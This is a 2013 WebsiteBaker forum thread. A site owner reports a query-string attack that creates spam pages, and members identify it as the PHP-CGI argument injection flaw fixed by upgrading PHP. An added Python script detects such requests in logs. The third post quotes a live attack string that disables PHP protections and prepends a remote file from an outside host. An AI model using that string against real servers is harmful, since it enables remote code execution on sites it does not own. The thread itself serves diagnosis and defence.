Author Topic: Code injection  (Read 4738 times)

Offline scheltel

  • Posts: 48
Code injection
« on: September 28, 2013, 11:59:28 AM »
Hi,

Which version of WebsiteBaker is not vulnerable to code injection?


Offline Argos

  • Posts: 2542
  • Gender: Male
    • Argos Media
Re: Code injection
« Reply #1 on: September 30, 2013, 10:45:00 AM »
I don't know, but I guess using the latest version is always the best way to be most secure.
Jurgen Nijhuis
Argos Media
Heiloo, The Netherlands
----------------------------------------------------------------
Please don't request personal support, use the forums!

Offline scheltel

  • Posts: 48
Re: Code injection
« Reply #2 on: September 30, 2013, 10:13:46 PM »
I'm using the most recent version but this version is not very secure....

Query strings like these dynamically generate 10 PHP pages in a WebsiteBaker site, which are used to send spam:
Code:
?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A//creativeresinsdistribution.com/wp-content/themes/twentytwelv/work.log

As you can see, the query string is able to set safe_mode Off, override the disable_functions settings of PHP and insert malicious code in a WebsiteBaker page.

What can be done to intercept query strings like these?


Offline Argos

  • Posts: 2542
  • Gender: Male
    • Argos Media
Re: Code injection
« Reply #3 on: September 30, 2013, 10:19:20 PM »
I don't know, but this topic doesn't belong here. I'll move it to the developers forum.

Offline DarkViper

  • Forum administrator
  • *****
  • Posts: 2993
  • Gender: Female
Re: Code injection
« Reply #4 on: September 30, 2013, 10:43:06 PM »
And what shall we do with this code? Pin it to the wall?
There are more than 500 possibilities to call WB. To which of these requests shall your string of args be attached? Which version/revision of WB? Which module and its version? What's the environment of your server?

Please: If you send a true security hint, then do it in a clear, straight and complete way so we can reproduce the issue.

thanks in advance
Manu.

-------------
[edited by admin: it's "which", not "witch" (=evil woman flying around on a broomstick)  :-D ]
« Last Edit: September 30, 2013, 10:46:07 PM by Argos »
The blue planet - it is not our property - we have only borrowed it from our descendants

"You have to take the men as they are… but you can not leave them like that !" :-P
The daily quick prayer: Oh Lord, throw them some brains from heaven!

Offline Ruud

  • Posts: 3647
  • Gender: Male
  • Do not use PM for help! Please use the forum!
    • Dev4Me - Professional WebsiteBaker Development
Re: Code injection
« Reply #5 on: September 30, 2013, 10:48:24 PM »
This is an old security issue of PHP, and has nothing to do with WB.

Have a look here:
http://blog.sucuri.net/2012/05/php-cgi-vulnerability-exploited-in-the-wild.html
http://www.php-security.net/archives/9-New-PHP-CGI-exploit-CVE-2012-1823.html

It is a PHP-CGI vulnerability that should be solved by your host.
Either upgrading to a recent PHP version or changing CGI mode to FastCGI should keep you protected in the future.

[edit: added an extra link with details]
« Last Edit: September 30, 2013, 10:58:09 PM by Ruud »
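
Added example (not part of the original thread and not WebsiteBaker or PHP project code): a log check for the PHP-CGI argument injection described in the links above. It relies on the CGI rule that a query string is handed to the binary as command-line arguments only when it contains no literal "=", which is why the posted string encodes every "=" as %3d. The Apache-style log format and the sample entries are constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

# Request line of an Apache-style access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def cgi_switches(query):
    """Return the command-line style switches a CGI-mode PHP would see."""
    # A literal "=" makes the query string ordinary form data; only a query
    # string without one is passed to the CGI binary as arguments.
    if not query or "=" in query:
        return []
    # "+" separates arguments and %xx is decoded before the binary sees them.
    return [tok for tok in unquote_plus(query).split() if tok.startswith("-")]

def scan(lines):
    """Return (line number, path, switches) for every suspicious request."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        path, _, query = match.group(1).partition("?")
        switches = cgi_switches(query)
        if switches:
            hits.append((number, path, switches))
    return hits

# Constructed sample entries (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [30/Sep/2013:22:01:02 +0200] "GET /index.php?page_id=4 HTTP/1.1" 200 5120',
    '192.0.2.11 - - [30/Sep/2013:22:01:09 +0200] "GET /search.php?websitebaker+security HTTP/1.1" 200 734',
    '198.51.100.7 - - [30/Sep/2013:22:02:30 +0200] "POST /index.php?-dsafe_mode%3dOff+-dallow_url_include%3dOn HTTP/1.1" 200 88',
    '192.0.2.10 - - [30/Sep/2013:22:03:00 +0200] "GET /index.php?q=-dsafe_mode HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for number, path, switches in scan(SAMPLE_LOG):
        print(f"line {number}: {path} carries php-cgi switches {switches}")
```

A hit on a server that still runs PHP in CGI mode is worth following up by looking for newly created PHP files, as reported earlier in this thread.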

Offline scheltel

  • Posts: 48
Re: Code injection
« Reply #6 on: September 30, 2013, 11:10:28 PM »
The query string is attached after the main index.php e.g. http://www.mywebsitebaker.com/index.php

The version of WebsiteBaker is: 2.8.3 [R1638] SP1
Server version: Windows 2008 completely patched
PHP: 5.2.17.17



Offline scheltel

  • Posts: 48
Re: Code injection
« Reply #7 on: September 30, 2013, 11:13:19 PM »
Ruud, the problem was the PHP version (5.2.17.17). After updating PHP to version 5.3.27 the malicious code in the query string is ignored.

Offline Ruud

  • Posts: 3647
  • Gender: Male
  • Do not use PM for help! Please use the forum!
    • Dev4Me - Professional WebsiteBaker Development
Re: Code injection
« Reply #8 on: September 30, 2013, 11:24:32 PM »
The bug is tracked back to 2004 in PHP, but only in (the outdated) CGI mode.
One more reason to keep systems updated.

A message to all (future) readers of this thread:


If you feel your website is hacked because of a possible security issue, please use one of the report forms here:
http://www.WebsiteBaker.org/en/community/security-issues.php

 
